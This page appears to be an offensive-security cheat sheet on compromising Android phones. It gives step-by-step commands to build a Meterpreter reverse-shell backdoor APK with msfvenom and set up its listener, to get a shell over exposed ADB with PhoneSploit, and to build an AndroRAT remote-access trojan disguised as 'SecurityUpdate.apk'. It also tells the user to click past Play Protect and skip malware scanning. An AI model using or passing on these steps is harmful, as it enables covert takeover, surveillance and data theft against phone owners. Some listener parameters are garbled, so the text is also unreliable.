Mobile Devices

Metasploit - Android Backdoor

To create an Android Meterpreter reverse_tcp backdoor using Metasploit, follow these steps:

  1. Generate the Backdoor:

    Open your terminal and enter the following command: msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=<Attacker IP> R > Desktop/Backdoor.apk

    Explanation: This command generates a reverse Meterpreter application for Android and saves it as "Backdoor.apk" on your desktop.

  2. Set Up the Listener: Open Metasploit with msfconsole In the Metasploit console, type: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST >Attacker IP> set LPORT <Attacker IP> run

  3. Install the Application:

    • Transfer the generated "Backdoor.apk" to the target Android device and install it. Once installed, you will see an "App installed" notification. Click "OPEN."

    • Note that a "Blocked by Play Protect" pop-up may appear. Click "INSTALL ANYWAY" to proceed with the installation.

    • If a "send app for scanning?" pop-up appears, click "DON'T SEND" to bypass the scanning process.

Android Debug Bridge (ADB) and PhoneSploit

Android Debug Bridge (ADB) is a versatile command-line tool that lets you communicate with a device. ADB facilitates a variety of device actions such as installing and debugging apps, and provides access to a Unix shell that you can use to run several different commands on a device.

Usually, developers connect to ADB on Android devices by using a USB cable, but it is also possible to do so wirelessly by enabling a daemon server at TCP port 5555 on the device.

PhoneSploit is a a tool for remote ADB exploitation written in Python3.

Example of remote shell

Install ADB and PhoneSploit:

apt install adb
git clone https://github.com/aerosol-can/PhoneSploit

Navigate to the PhoneSploit directory:

cd PhoneSploit

Install the required dependency using Python3:

python3 -m pip install colorama

Launch PhoneSploit by running:

python3 phonesploit.py

In the PhoneSploit menu, type '3' to select the option for connecting a new phone.

When prompted to enter the target Android device's IP address, provide the IP address.

The target Android device will connect through port number 5555.

Back in the main menu, type '4' to access the shell on the target phone.

When prompted to enter a device name, type the target Android device's IP address.

You'll now have a shell command line.

AndroRAT

AndroRAT is a tool created with the aim of granting remote control of an Android system to a user, while also enabling the retrieval of various information from the target device. This software operates as a client/server application, with the client side developed in Java Android, and the server component implemented in Python.

It offers a persistent backdoor to the targeted device. It automatically launching itself upon device boot-up. Once active, it can collect data, including the device's current location, SIM card information, IP address, and MAC address.

  1. Install:

    git clone https://github.com/karma9874/AndroRAT.git
    cd AndroRAT
    pip install -r requirements.txt
  2. To create an APK file (here, SecurityUpdate.apk): python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk

  3. Transfer to victim

  4. start listening to the victim's machine: python3 androRAT.py --shell -i 0.0.0.0 -p 4444

  5. Once installed and executed (opened) on the victims Android device you'll have a remote shell.

Last updated